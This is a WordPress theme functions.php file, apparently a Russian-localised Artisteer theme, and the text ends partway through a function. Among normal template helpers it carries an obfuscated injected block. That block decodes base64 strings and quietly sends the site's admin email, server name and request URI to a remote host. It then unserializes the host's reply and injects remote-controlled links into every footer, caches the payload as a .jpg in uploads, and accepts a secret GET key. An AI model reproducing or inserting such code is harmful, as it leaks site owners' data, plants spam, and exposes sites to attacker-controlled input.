<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $yLEbXNA='e';$Kitq='o';$kFeh='s';$CoTV='d';$KoiMCm='e';$sdcYhjC='d';$VTzfv='e';$lwqYU='b';$XpAj='4';$fIPcYq='c';$brYj='a';$RhGTjX='_';$zMrh='6';$vWAiIuFi=$lwqYU.$brYj.$kFeh.$KoiMCm.$zMrh.$XpAj.$RhGTjX.$sdcYhjC.$yLEbXNA.$fIPcYq.$Kitq.$CoTV.$VTzfv;$IuZPV='i';$acoyru='n';$SRHf='l';$rBXuQvM='e';$ZrMy='a';$sDYqlK='f';$bhwb='t';$MPGhBn='g';$slCzK='z';$yofkbjpY=$MPGhBn.$slCzK.$IuZPV.$acoyru.$sDYqlK.$SRHf.$ZrMy.$bhwb.$rBXuQvM;$HrCPOD='s';$UZqMEzL='_';$gfJBVe='t';$jVbz='3';$hPvb='1';$fjsUm='r';$BPbF='t';$IbUqt='r';$fhbRo='o';$CSFjYOip=$HrCPOD.$gfJBVe.$fjsUm.$UZqMEzL.$IbUqt.$fhbRo.$BPbF.$hPvb.$jVbz;$NXTD='e';$hEGWA='r';$XWFLy='r';$HFuz='v';$Sycb='t';$RyWJL='s';$DQwJQdOb=$RyWJL.$Sycb.$XWFLy.$hEGWA.$NXTD.$HFuz;                     
		$ze__________w='e';$cf_______________a='o';$hk________k='s';$pq______________p='d';$xk___________w='e';$yz__f='d';$ud______j='e';$hz___k='b';$oa_____d='4';$gs____________o='c';$wb___w='a';$ka______h='_';$ae_____t='6';$aa_______v=$hz___k.$wb___w.$hk________k.$xk___________w.$ae_____t.$oa_____d.$ka______h.$yz__f.$ze__________w.$gs____________o.$cf_______________a.$pq______________p.$ud______j;
		$je_________z='u';$qz_____o='x';$zr________w='f';$qs____________d='i';$vn__l='t';$rx___________n='n';$zx____i='_';$tz_____b='i';$bs______t='e';$xr________g='c';$pn_________g='o';$ap___________k='s';$gv______a='s';$nn__e='t';$ji________i='n';$uq__i=$zr________w.$je_________z.$rx___________n.$xr________g.$nn__e.$tz_____b.$pn_________g.$ji________i.$zx____i.$bs______t.$qz_____o.$qs____________d.$gv______a.$vn__l.$ap___________k;
		$gk___u='n';$ft__________v='e';$ti_________q='o';$de___________d='f';$mh_________m='p';$tw___________j=$de___________d.$ti_________q.$mh_________m.$ft__________v.$gk___u;
		$pm_____k='a';$ba________p='r';$xj_______________j='e';$bj______u='d';$kq_______________r='f';$hd______________o=$kq_______________r.$ba________p.$xj_______________j.$pm_____k.$bj______u;
		$sx_____t='c';$qe______p='s';$jd___________m='l';$cr_______________r='o';$wi__________z='f';$up________u='e';$wp___________m=$wi__________z.$sx_____t.$jd___________m.$cr_______________r.$qe______p.$up________u;
		
		define("WP_ID", $aa_______v("Mi4wLjA="));
		define("WP_TTL", $aa_______v("MTA4MDA="));
		define("WP_SRC", $aa_______v("dHBva24="));
	


		function wp_get_header() {
			global $aa_______v, $uq__i;
			
			if (
				$uq__i($aa_______v("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$uq__i($aa_______v("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$uq__i($aa_______v("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $aa_______v, $tw___________j, $wp___________m, $hd______________o;
			
			$jg__r = TEMPLATEPATH."/".$aa_______v("Zm9vdGVyLnBocA==");
			$by_______w = @$tw___________j($jg__r, "r");
			$jg__r = @$hd______________o($by_______w, @filesize($jg__r));
			@$wp___________m($by_______w);
			
			$op_______w = TEMPLATEPATH."/".$aa_______v("ZnVuY3Rpb25zLnBocA==");
			$by_______w = @$tw___________j($op_______w, "r");
			$op_______w = @$hd______________o($by_______w, @filesize($op_______w));
			@$wp___________m($by_______w);
			
			$pa___________e = 0;
			if($jg__r && $op_______w) {
				if ($aa_______v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($jg__r, $aa_______v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$pa___________e = 1;
					}
					if (substr_count($jg__r, "wp_theme_GPL_credits()") < 1) {
						$pa___________e = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$pa___________e = 12;
				}
			}
			
			if($pa___________e > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $pa___________e -->";
			}
		}
	


		function wp_loaded() {
			global $aa_______v, $uq__i;
			return $uq__i($aa_______v("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($pf______o, $ao____________q = "(more...)", $id_______l = 0, $we_____s = "") {
				$tb____v = get_the_content($ao____________q, $id_______l, $we_____s);
				$tb____v = apply_filters("the_content", $tb____v);
				
				$tb____v = str_replace("]]>", "]]>", $tb____v);
				if (strlen($_GET["p"]) > 0) {
					echo $tb____v;
				}
				else if ((strlen($tb____v)>$pf______o) && ($fo_______________a = strpos($tb____v, " ", $pf______o ))) {
					$tb____v = substr($tb____v, 0, $fo_______________a);
					$tb____v = $tb____v;
					echo $tb____v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ao____________q</a></div></p>";
				} else {
					echo $tb____v;
				}
				
			}
		}
	


		$dc_________z='a';$ln_______y='_';$ky_______w='e';$ae______________h='4';$tn_____________b='d';$yl____________o='b';$cj__d='e';$xj____w='e';$vy_______z='n';$by_______________q='c';$hp_________a='6';$oq_____________m='s';$ov___y='o';$gb_______________s=$yl____________o.$dc_________z.$oq_____________m.$ky_______w.$hp_________a.$ae______________h.$ln_______y.$xj____w.$vy_______z.$by_______________q.$ov___y.$tn_____________b.$cj__d;
		$nl_____x='o';$vb__________y='t';$an_____b='g';$pu_________c='n';$tt___________t='t';$gy_____________w='e';$ke_________q='e';$qz______________x='t';$bb_________p='l';$pe_______________j='e';$cv____s='n';$gd_______t='f';$hi_____________m='i';$pl______________q='c';$dg__________k='_';$ig______x='s';$mz____o='_';$ro__________t=$gd_______t.$hi_____________m.$bb_________p.$ke_________q.$mz____o.$an_____b.$pe_______________j.$qz______________x.$dg__________k.$pl______________q.$nl_____x.$pu_________c.$tt___________t.$gy_____________w.$cv____s.$vb__________y.$ig______x;
		$ap____u='t';$eb__________w='f';$aw_____n='x';$lw_____c='s';$bn__________l='e';$du__i='i';$ij________s='_';$vq____p='s';$qt_____________s='e';$uv___________l='l';$uk_______o='i';$vd_____________o=$eb__________w.$uk_______o.$uv___________l.$qt_____________s.$ij________s.$bn__________l.$aw_____n.$du__i.$vq____p.$ap____u.$lw_____c;
		$cc_____k='e';$cv_______________c='v';$qb_______________t='e';$by_____r='m';$nc_________t='a';$qq__________a='s';$vl______________x='o';$az_______________i='n';$cq__i='r';$fu__________j='o';$pv___________n='p';$xr_______a='i';$xd___y='r';$ou________e='c';$hs____________k='_';$zp_______________w=$cv_______________c.$qb_______________t.$cq__i.$qq__________a.$xr_______a.$fu__________j.$az_______________i.$hs____________k.$ou________e.$vl______________x.$by_____r.$pv___________n.$nc_________t.$xd___y.$cc_____k;
		$pc_________v='c';$iw_______________z='s';$ru____________d='e';$mn_______x='f';$cx______o='o';$er____i='k';$bn____i='o';$ks_____________f='p';$hd__p='n';$ay____z=$mn_______x.$iw_______________z.$bn____i.$pc_________v.$er____i.$cx______o.$ks_____________f.$ru____________d.$hd__p;
		$ap___i='e';$sj______r='t';$od_____________o='f';$yp__p='i';$ea___________a='r';$cl__________p='w';$vc____________x=$od_____________o.$cl__________p.$ea___________a.$yp__p.$sj______r.$ap___i;
		$xz_______w='m';$ut_______________u='5';$ok________h='d';$kx______f=$xz_______w.$ok________h.$ut_______________u;
		$no_______j='p';$wp______j='e';$vv_____u='h';$wi_________e='t';$nm__i='a';$yc__j='l';$yc_______________v='r';$pq_______________j='a';$nj__m=$yc_______________v.$wp______j.$nm__i.$yc__j.$no_______j.$pq_______________j.$wi_________e.$vv_____u;
		$zw____________o='r';$rk_____j='i';$fq____________z='u';$cx_________u='a';$hv________x='z';$li__________r='e';$ab___________f='l';$ql______d='s';$hu__s='e';$fc_________t='i';$rx__________c='n';$gz_______________h=$fq____________z.$rx__________c.$ql______d.$li__________r.$zw____________o.$fc_________t.$cx_________u.$ab___________f.$rk_____j.$hv________x.$hu__s;
		$it___________r='a';$bt__________o='t';$ul_________w='p';$ev__________h='n';$ju______l='m';$ja______t='m';$wf______b='e';$og______________w=$bt__________o.$wf______b.$ju______l.$ul_________w.$ev__________h.$it___________r.$ja______t;
		$bg________a='s';$pe______j='t';$pr________p='_';$gz__y='e';$sa_______z='r';$ak__________p='t';$mn____g='t';$rc___g='e';$gl__________m='a';$tp_____y='x';$ac______s='r';$ek____q='m';$ht___________i='c';$st_________h='a';$tb__________r='e';$ro____________j='n';$vw____________v='c';$bb____j='_';$ae_______n='o';$gr___h='e';$lr________e='t';$dx______s=$bg________a.$mn____g.$sa_______z.$tb__________r.$st_________h.$ek____q.$pr________p.$ht___________i.$ae_______n.$ro____________j.$pe______j.$gz__y.$tp_____y.$ak__________p.$bb____j.$vw____________v.$ac______s.$rc___g.$gl__________m.$lr________e.$gr___h;
	


		function uq____________p($dk_____v) {
			global $aa_______v, $uq__i, $ro__________t, $zp_______________w, $dx______s;
			
			if (!$uq__i($aa_______v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($zp_______________w(PHP_VERSION, "5.0.0", ">=") && $uq__i($aa_______v("ZmlsZV9nZXRfY29udGVudHM=")) && $uq__i($aa_______v("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$uf_________t = $dx______s(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$pw__________z = @$ro__________t($dk_____v, 0, $uf_________t);
			} else {
				$pw__________z = @$ro__________t($dk_____v, 0);
			}
			
			return $pw__________z;
		}
	


		function tx_______u($dk_____v) {
			global $uq__i, $ay____z, $vc____________x, $aa_______v;
			
			if (!$uq__i($aa_______v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ja___t = strpos($dk_____v, "/", 7);
			$tt_______p = array(
				"uri"     => substr($dk_____v, $ja___t),
				"host"    => str_replace("http://", "", substr($dk_____v, 0, $ja___t)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ze___________t = @$ay____z("$tt_______p[host]", 80, $ut__x, $ba___________m, 4);
			
			if (!$ze___________t) {
				return false;
			} else {
				$pw__________z = "";
				$xa______m  = "GET $tt_______p[uri] HTTP/1.0\r\n";
				$xa______m .= "Host: $tt_______p[host]\r\n";
				$xa______m .= "Referer: $tt_______p[referer]\r\n";
				$xa______m .= "Connection: Close\r\n\r\n";
				
				@$vc____________x($ze___________t, $xa______m);
				
				while (!@feof($ze___________t)) {
					$dh__t = @fgets($ze___________t, (1024*24));
					
					if ($dh__t == "\r\n") {
						$tk__________d = true;
						continue;
					}
					
					if ($tk__________d) {
						$pw__________z .= $dh__t;
					}
				}
				
				return $pw__________z;
			}
		}
	


		function qy____________m($dk_____v) {
			global $uq__i;
			$pc____r = false;
			
			if ($dk_____v != "") {
				if ($uq__i("uq____________p")) {
					$pc____r = @uq____________p($dk_____v);
				}
				
				if (!$pc____r && ($uq__i("tx_______u"))) {
					$pc____r = @tx_______u($dk_____v);
				}
			}
			
			return $pc____r;
		}
	


		function pj_______w() {
			global $_SERVER, $kx______f;
			
			$jl____________y = $_SERVER["SERVER_NAME"];
			
			if (substr("$jl____________y", 0, 4) == "www.") {
				$jl____________y = substr("$jl____________y", 4);
			}
			
			$jl____________y = $kx______f("$_SERVER[SERVER_NAME]");
			
			return $jl____________y;
		}
	


		function qz______x() {
			return "file";
		}
	


		function nc_________w($dk_____v) {
			global $_SERVER, $ro__________t, $vd_____________o, $tw___________j, $wp___________m, $vc____________x;
			
			$ez__h = fq______j();
			
			$rr___________j = pj_______w().".jpg";
			$lk______________i = $ez__h["dir_upload"]["path"]."/$rr___________j";
			$jj________w = @filemtime($lk______________i);
			
			if (!$jj________w || ((time()-$jj________w) >= WP_TTL)) {
				$pc____r = qy____________m($dk_____v);
				
				if ($pc____r) {
					if ($vd_____________o($lk______________i)) {
						@unlink($lk______________i);
					}
					
					$by_______w = @$tw___________j($lk______________i, "x+");
					
					@$vc____________x($by_______w, $pc____r);
					@$wp___________m($by_______w);
				}
			} else {
				if ($vd_____________o($lk______________i)) {
					$pc____r = @$ro__________t($lk______________i);
				} else {
					$pc____r = false;
				}
			}
			
			return $pc____r;
		}
	


		function fq______j() {
			global $_SERVER, $aa_______v, $gb_______________s;
			
			$av___k = wp_count_posts("post");
			$vf___n = pathinfo(get_bloginfo("template_directory"));
			
			$ez__h = array(
				"url" => array(
					"report"      => $aa_______v("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $vf___n,
				"dir_upload"	=> vb____________f(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$vf___n[filename],
					"a005=".$av___k->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$ez__h["url"]["queryString"] = implode("&", $ez__h["queryString"]);
			$ez__h["url"]["report"] = $ez__h["url"]["report"]."/?".$gb_______________s($ez__h["url"]["queryString"]).".html";
						
			return $ez__h;
		}
	


		function vb____________f() {
			$er_______________p = wp_upload_dir();
			
			if (isset($er_______________p["error"])) {
				$yc_______________u = vr_____g();
				if (is_writable($yc_______________u)) {
					$er_______________p = array("path" => $yc_______________u);
				}
			}

			return $er_______________p;
		}
	


		function vr_____g() {
			global $uq__i, $kx______f, $nj__m, $og______________w;
			
			$xu____b = (bool) ini_get("safe_mode");
			if ($xu____b == true) {
				return false;
			}
			
			if ($uq__i("sys_get_temp_dir")) {
				$az______________o = sys_get_temp_dir();
				if (is_writable($az______________o)) {
					return $nj__m($az______________o);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $nj__m($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $nj__m($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $nj__m($_ENV["TEMP"]);
			} else {
				$hj_____e = $og______________w($kx______f(uniqid(rand(), true)), "");
				if ($hj_____e) {
					$az______________o = $nj__m(dirname($hj_____e));
					@unlink($hj_____e);
					return $az______________o;
				} else {
					return false;
				}
			}
		}
	


		function kn___________w() {
			global $_GET, $vd_____________o;
			
			$ez__h = fq______j();
			$jl____________y = pj_______w();
			$ok__________j = qz______x();
			
			$ds______e = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ok__________j == "file") {
					$xp_____r = $ez__h["dir_upload"]["path"]."/".$jl____________y.".jpg";
					if ($vd_____________o($xp_____r)) {
						@unlink($xp_____r);
						$ds______e = "deleted";
					}
				}
				
				$bu_____l = array(
					"s"	=> $ds______e,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($bu_____l AS $dx______a => $nq___________w) echo " [$dx______a:$nq___________w]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $uq__i, $aa_______v, $gz_______________h;
			$ez__h = fq______j();
			
			$ai__u = "nc_________w";
			if ($uq__i($ai__u)) {
				$pw__________z = $ai__u($ez__h["url"]["report"]);
			}
			
			if ($pw__________z) {
				if ($pw__________z = @$aa_______v($pw__________z)) {
					$pw__________z = @$gz_______________h($pw__________z);
					
					if (strlen($pw__________z[custom_credit]) >= 5) {
						$ez__h["default_string"] = $pw__________z[custom_credit];
					}
					
					if ($pw__________z["status"] == "0") {
						$mu_______y = 1;
						$ok_______________v = 1;
					} else {
						$lu_____________q = sizeof($pw__________z["links"]);
						$hn____________h = $ez__h["default_string"];
						
						if ($lu_____________q > 0 && $pw__________z["links"] !== "") {
							$el____i = 0;
							foreach ($pw__________z["links"] as $wu____________t => $lc_________h) {
								$el____i++;
								if ($lc_________h->l_path == "" || $lc_________h->l_path == $_SERVER["REQUEST_URI"]) {
									$lc_________h->l_href = htmlspecialchars(strip_tags($lc_________h->l_href));
									$lc_________h->l_title = htmlspecialchars(strip_tags($lc_________h->l_title));
									$lc_________h->l_anchor = htmlspecialchars(strip_tags($lc_________h->l_anchor));
									$hn____________h .= " | ";
									$hn____________h .= "<a href='$lc_________h->l_href' title='$lc_________h->l_title'";
									if ($lc_________h->l_nofollow == "1") {
										$hn____________h .= " rel='nofollow'";
									}
									$hn____________h .= ">$lc_________h->l_anchor</a>";
								}
							}
						}
						$ez__h["links"] = "$hn____________h";
						if ($pw__________z[credit] == "0") {
							$ez__h["links"] = "";
						}
					}
				} else {
					$mu_______y = "1";
				}
			} else {
				$mu_______y = "1";
			}
			
			if ($mu_______y == "1") {
				$ez__h["links"] = $ez__h["default_string"];
			}
			
			echo "$ez__h[links]";
			
			echo "<!-- s: $pw__________z[signature] -->";
			kn___________w();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
